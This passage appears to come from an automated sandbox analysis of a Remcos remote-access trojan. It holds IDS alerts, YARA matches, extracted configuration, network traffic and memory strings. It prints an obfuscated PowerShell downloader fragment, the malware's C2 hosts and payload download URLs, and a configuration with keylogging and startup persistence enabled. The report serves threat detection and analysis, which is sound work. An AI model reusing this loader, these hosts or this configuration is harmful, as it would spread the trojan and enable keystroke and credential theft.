Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;Unisexes (Ivywood ' $,g.l otb aRlt:.S k r iFv.eHb oNr dcs t
                Timestamp:07/01/24-15:37:44.155641
                SID:2032776
                Source Port:50575
                Destination Port:3980
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-15:37:45.014656
                SID:2032777
                Source Port:3980
                Destination Port:50575
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: janbours92harbu02.duckdns.orgAvira URL Cloud: Label: malware
                Source: 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "janbours92harbu02.duckdns.org:3980:0janbours92harbu02.duckdns.org:3981:1janbours92harbu03.duckdns.org:3980:0", "Assigned name": "Proof007", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jmoughoe-LDOW5Q", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kpburtts.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: Yara matchFile source: 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2264, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: unknownHTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.6:50573 version: TLS 1.2
                Source: Binary string: qm.Core.pdbr source: powershell.exe, 00000005.00000002.2558083418.00000000077B6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2561261956.0000000008860000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5vs source: powershell.exe, 00000005.00000002.2549153346.0000000002F8D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2558083418.000000000774E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2561261956.0000000008860000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .Core.pdbTm source: powershell.exe, 00000005.00000002.2558083418.00000000077B6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2558083418.000000000774E000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EA10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_20EA10F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EA6580 FindFirstFileExA,11_2_20EA6580
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898

                Software Vulnerabilities

                barindex
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.6:50575 -> 206.123.148.194:3980
                Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 206.123.148.194:3980 -> 192.168.2.6:50575
                Source: Malware configuration extractorURLs: janbours92harbu02.duckdns.org
                Source: unknownDNS query: name: janbours92harbu02.duckdns.org
                Source: global trafficTCP traffic: 192.168.2.6:50575 -> 206.123.148.194:3980
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewIP Address: 206.123.148.194 206.123.148.194
                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: global trafficHTTP traffic detected: GET /New/New/Pustene.lpk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /New/New/mVbkq170.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doCache-Control: no-cache
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /New/New/Pustene.lpk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /New/New/mVbkq170.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: wab.exe, 0000000B.00000002.3444547352.0000000020E70000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: wab.exe, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: wab.exe, 00000010.00000002.2603458101.0000000004DF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: wab.exe, 00000010.00000002.2603458101.0000000004DF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: wab.exe, 0000000B.00000002.3444830875.00000000216F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000B.00000002.3444830875.00000000216F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: contemega.com.do
                Source: global trafficDNS traffic detected: DNS query: janbours92harbu02.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB97B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://contemega.com.do
                Source: powershell.exe, 00000002.00000002.2679653181.000001DBAE348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                Source: powershell.exe, 00000005.00000002.2558083418.00000000077B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                Source: wab.exe, 0000000B.00000002.3429074546.0000000005068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                Source: wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: wab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp%p
                Source: wab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp.p
                Source: wab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpIp
                Source: wab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpVp
                Source: wab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpal
                Source: powershell.exe, 00000002.00000002.2679653181.000001DBAE348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
                Source: powershell.exe, 00000002.00000002.2668709649.000001DBA5DCE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2555412225.0000000005FB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://ocsp.digicert.com0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://ocsp.digicert.com0:
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://ocsp.digicert.com0H
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://ocsp.digicert.com0I
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://ocsp.digicert.com0Q
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://ocsp.msocsp.com0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://ocsp.msocsp.com0S
                Source: powershell.exe, 00000005.00000002.2550349673.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2558083418.0000000007706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB95D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2550349673.0000000004E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.2550349673.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2558083418.0000000007706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: bhv88BF.tmp.16.drString found in binary or memory: http://www.digicert.com/CPS0~
                Source: wab.exe, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: wab.exe, wab.exe, 00000012.00000002.2584615593.000000000329D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: wab.exe, 0000000B.00000002.3444547352.0000000020E70000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: wab.exe, 00000012.00000002.2584615593.000000000329D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.compData
                Source: wab.exe, 0000000B.00000002.3444547352.0000000020E70000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: powershell.exe, 00000002.00000002.2679653181.000001DBAE348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                Source: powershell.exe, 00000002.00000002.2679653181.000001DBAE348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co0
                Source: wab.exe, 00000010.00000002.2602811179.0000000002DD4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB95D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.2550349673.0000000004E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB97B1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.P
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.c
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.co
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.d
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB95F84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2605528910.000001DB977C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3429074546.0000000005068000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3429074546.0000000005038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/N
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Ne
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/N
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/Ne
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/P
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/Pu
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/Pus
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/Pust
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/Puste
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/Pusten
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/Pustene
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/Pustene.
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/Pustene.l
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/Pustene.lp
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/Pustene.lpk
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB95F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/Pustene.lpk0z
                Source: powershell.exe, 00000005.00000002.2550349673.0000000004F65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/Pustene.lpkXR)l
                Source: wab.exe, 0000000B.00000002.3429074546.00000000050A3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3429074546.0000000005068000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3444052038.0000000020930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/mVbkq170.bin
                Source: wab.exe, 0000000B.00000002.3429074546.0000000005068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/New/New/mVbkq170.binN
                Source: powershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
